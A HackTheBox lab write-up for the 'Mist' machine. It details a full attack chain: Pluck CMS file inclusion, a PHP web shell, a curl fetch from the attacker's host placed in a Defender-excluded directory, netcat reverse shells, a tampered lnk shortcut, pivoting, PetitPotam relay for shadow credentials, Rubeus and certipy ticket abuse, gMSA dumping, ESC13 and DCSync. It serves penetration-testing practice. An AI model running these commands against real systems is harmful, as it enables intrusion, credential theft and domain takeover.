HackTheBox — Mist

ARZ101
13 min readOct 28, 2024

--

Mist an insane difficult machine involved an instance of pluck being vulnerable to both local file inclusion (LFI) and remote code execution (RCE), uploading a php shell in a excluded directory to avoid defender flagging it, enumerating the filesystem to escalate privileges through lnk files, with ligolo-ng pivoting into the network to reach DC01 in order to perform shadow credentials through NTLM relay over HTTP (since SMB signing was enabled) on MS01 , with administrator enumerating the file system again to find keepass file with credentials which had ReadGMSA, performing shadow credentials again on a domain user and then escalating to domain admin through ESC13 abuse.

Nmap scan report for 10.10.11.17
Host is up (0.30s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-generator: pluck 4.7.18
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set

From the scan we have only port 80 open, visiting the web server we have Pluck hosted

On trying to login we’ll see the version being disclosed

This version is vulnerable to authenticated remote code execution but currently we don’t have any credentials

Trying the default ones like password and admin:admin didn’t worked, fuzzing for files, there’s cgi-bin directory which can reveal something here

So fuzzing again at this directory for any pl files, we can find printenv.pl

This file lists some configuration for XAMPP, showing a username as well, svc_web

Getting admin access through Local File Inclusion (LFI)

Checking the github issues for Pluck CMS, there seems to be LFIon /data/modules/albums/albums_getimage.php?image=

On trying to read /etc/passwd it was detecting ../

We can however view the albums on pluck cms as shown in the poc for LFI from where we can list contents of albums directory revealing admin_backup.php

This can be read by just appending admin_backup.php to image parameter

Having the admin hash, we can attempt to crack it using hashcat by using mode 1700 which is for SHA-512

hashcat -a 0 -m 1700  ./admin_hash.txt /usr/share/wordlists/rockyou.txt --force

With this password we can login as admin on pluck

Gaining a shell as svc_web

Now we can use the previous RCE exploit, uploading a module by zipping a php file having GET parameter being passed into system function for executing commands

<?php system($_GET['cmd']); ?>

But this file will be deleted within 1–2 minutes so there’s probably a cleanup script or defender removing these files, for getting a shell, upload and execute netcat to get a reverse shell as svc_web

Again as soon as the php file gets removed our shell will die

So what we can do here is to upload a php file in defender’s exclusion list where it wont’ delete any malicious files, checking the permissions of C:\xampp, we have write access on this directory, so we can upload a php file there and then get a shell

<?php system('curl http://10.10.16.17/uwu.php -o C:/xampp/htdocs/uwu.php'); ?>

Checking the privileges of this local user, it doesn’t seem to have any privilege which can lead to local admin

Running arp -a to see the hosts on the network we get one IP 192.168.100.100 which seems it's the IP of domain controller

For accessing this host from our kali machine we need to perform pivoting from MS01 using ligolo-ng

sudo ip link set ligolo up
sudo ip route add 192.168.100.0/24 dev ligolo

We can confirm the reachability of DC01 by pinging or running nxc to check smb

Here I tried checking guest account for brute forcing SIDs to get a list of domain users but that account was disabled

Also tried checking for AS-REP roasting on the two domain accounts we can see on MS01 but it also failed

Enumerating shares with null authentication didn’t yield any stuff as well

Moving back to MS01 and enumerating the system by uploading winpeas in C:/xampp/htdocs/ as it is excluded by defender

Escalating Privileges (brandon.keywarp)

Brandon.keywarp is logged in onto this system so there might be some tasks or files being checked by this user, there's also Common Applications directory which is writable by local users

This directory contains few lnk files

Transferring any one of the lnk files on our windows machine to edit the location of the shortcut

Now editing this lnk file to execute nc from C:\xampp\htdocsto get a shell

From here we can run bloodhound to enumerate the domain

Brandon didn’t had any ACLs and wasn’t in any special group

It’s the same with Sharon

But there’s Operatives group which has ReadGMSAPasswowrd on SVC_CA$ account

And this group has these two group members who can also PSRemote (gain remote session through winrm) on DC01

Recovering brandon’s NThash

Since smb signing is enabled on DC01, we need to relay using HTTP authentication which can be done only if WebClient service is enabled which is currently disabled, this can be checked using GetWebDAVStatus

For enabling this service, start responder then try mapping the share to kali machine with http protocol

Since we have a shell as brandon, we can verify if ADCS is installed on DC using certutil

Using certify we can list down the templates which are enabled, if User template is enabled we can then request a certificate and get the NTHash of brandon

Certify.exe request /ca:DC01.mist.htb\mist-DC01-CA /template:User /domain:mist.htb

Converting the pem into pfx file in order to use it for authenticating from certipy to retrieve NTLM hash of brandon

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
certipy auth -pfx cert.pfx  -dc-ip 192.168.100.100  -username Brandon.Keywarp -domain mist.htb

Shadow Credentials Through NTLM Relay

Now that have brandon’s hash, we can use PetitPotam to cause coercion for MS01 with webdav protocol which is going to perform HTTP authentication leading to shadow credentials on MS01 but before that let’s verify if we can coerce the authentication on smb, for this we need to start chisel with socks proxy

chisel.exe client 10.10.16.43:9000 R:socks
chisel server --reverse -p 9000

For HTTP coercion, webclient service will be enabled on port 8080, so we need to redirect that port from MS01 to our kali machine this is known as port bending, for this I’ll be using StreamDivert for redirecting outbound traffic on port 8080 to my kali machine on port 80

tcp > 8080 0.0.0.0 -> 10.10.16.43 80

Running PetitPotam again, this time setting the listener to be MS01

proxychains python3 /opt/PetitPotam/PetitPotam.py -u brandon.keywarp -hashes ':hash' MS01@8080/test 192.168.100.101

This machine account hash can now be relayed to DC01 on ldaps to perform shadow credentials using ntlmrealyx (make sure turn HTTP Off from responder.conf), normally machine accounts can edit their own msDS-KeyCredentialLink attribute but to my surprise this did not worked as it showed it's missing some rights here

This is probably due to value is already set and for some reason we cannot overwrite this property, there’s another variation of ntlmrelayx which supports both clearing and setting the value of msDS-KeyCredentialLink using an interactive ldap shell, so relaying it again but this time using this version

Getting administrator on MS01

We now have the certificate and the password, using gettgtpkinit from PKINITools we can retrieve MS01 aeskey and TGT

NTHash can be recovered as well either by certipy auth or using Rubeus

Rubeus.exe asktgt /user:MS01$ /domain:mist.htb  /certificate:./orGRT9Km.pfx /password:aCSx4xhH2ZqvYxSAseyK /getcredentials /nowrap

Impersonating as local admin on MS01 using HOST service

Rubeus.exe s4u /self /user:MS01$ /rc4:4A74FC05400345D580CF58AEC3E6D833 /altservice:host/ms01.mist.htb /impersonateuser:administrator /ptt /nowrap

Converting this kirbi (base64) ticket into ccache which is supported by impacket

And using wmiexec.py to get an interactive shell as admin

This can also be done purely through linux

proxychains ticketer.py -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -domain mist.htb -spn HOST/MS01.mist.htb -nthash 4A74FC05400345D580CF58AEC3E6D833 -user-id 500 Administrator

Shell as OP_Sharon

From bloodhound we saw OP_Sharon is member of Operatives group who ha ReadGMSA permission on SVC_CA$ and had PSRemote on DC, so sharon on MS01 might be interesting, checking the documents directory we have sharon.kdbx file which is a keepass database file

Reading this file will required a password

From pictures directory, we have two image files

The second image shows us a password

The text UA7cpa[#1!_*ZX doesn't represent the base64 encoded value in the image

So we might be missing some characters that we need to recover, creating a wordlist with crunch to brute force the last character

Having the master password we can access the keepass file and get the password for sharon

For moving forward, pivoting using ligolo-ng as proxychains is a bit slow in reaching to MS01 internal ports and DC01, by creating ligolo interface device and adding 192.168.100.0/24 route

Spraying this password on both sharon and op_sharon

Since op_sharon has PSRemote on DC, we can login through winrm

For reading GMSA password, we can use AD module but I’ll be using gMSADumper

python3 /opt/gMSADumper/gMSADumper.py -u 'OP_SHARON.MULLARD' -p 'pass' -d mist.htb -l 192.168.100.100

Shadow credentials on SVC_CABACKUP

Now with this account we can get access to SVC_CABackup user by having AddKeyCredentialLink access control, which basically is again performing shadow credentials attack through pyWhisker

python3 pywhisker.py  -u 'svc_ca$' -H 'hash' -t SVC_CABACKUP -a add  -d mist.htb --dc-ip 192.168.100.100

To retrieve the NThash, using the same steps which were performed for MS01$

Rubeus.exe asktgt /user:SVC_CABACKUP /domain:mist.htb  /certificate:./SW9Iavcw.pfx /password:ciCdAJ1qPObnqR57ltDL /getcredentials /nowrap

Getting Domain Admin Through ESC13

Recently two new ADCS attacks were introduced dubbed as ESC13 & ESC14, from certipy’s github issues we can see support for ESC13 being added as well

So cloning this version of certipy , we can find a certificate template ManagerAuthentication being vulnerable to ESC13

This template has an Extended Key Usage (EKU) for Client Authentication which means that through this certificate we can perform authentication, this certificate is linked with Certificate Managers group and members of certificate services can enroll for this certificate

This can grant privileges of a linked group to the user who enrolls for it without being part of that group, this is known as ESC13. Requesting the certificate with ManagerAuthentication template, this is going to show an error for public key not meeting the minimum size

By default certipy uses 2048 as the length of public key, this can be changed to 4096 with -key-size parameter

certipy req -u 'SVC_CABACKUP' -hashes 'hash' -ca 'mist-DC01-CA' -dc-ip 192.168.100.100 -template 'ManagerAuthentication' -key-size 4096

We have the certificate for svc_backup but this holds the permissions of certificate managers, so requesting a TGT with this certificate

python3 gettgtpkinit.py -cert-pfx ./svc_cabackup.pfx -dc-ip 192.168.100.100 mist.htb/SVC_CABACKUP SVC_CABACKUP.ccache

Listing the templates again, we can see BackupSvcAuthentication can be enrolled with CA Backup members which we are with the current certificate that we have

On requesting this certificate we can again privileges of ServiceAccounts group which is a member of Backup Operators group

Being in this group we can backup the registry hives to dump SAM hashes of DC account and then perform DCSync

certipy req -u 'SVC_CABACKUP@mist.htb' -k -no-pass -ca 'mist-DC01-CA' -dc-ip 192.168.100.100  -target DC01.mist.htb -template 'BackupSvcAuthentication' -key-size 4096

Exporting this TGT and starting smb server through smbserver.py to backup the SAM, SYSTEM and SECURITY from the registry hive using reg.py

(For dumping SYSTEM file, it will take some time), after having these 3 files running secretsdump.py locally and using the $MACHINE.ACC hash to performing dcsync

References

--

--

ARZ101
ARZ101

Written by ARZ101

Smol Pentester| OSCP | gib AD | UwU

No responses yet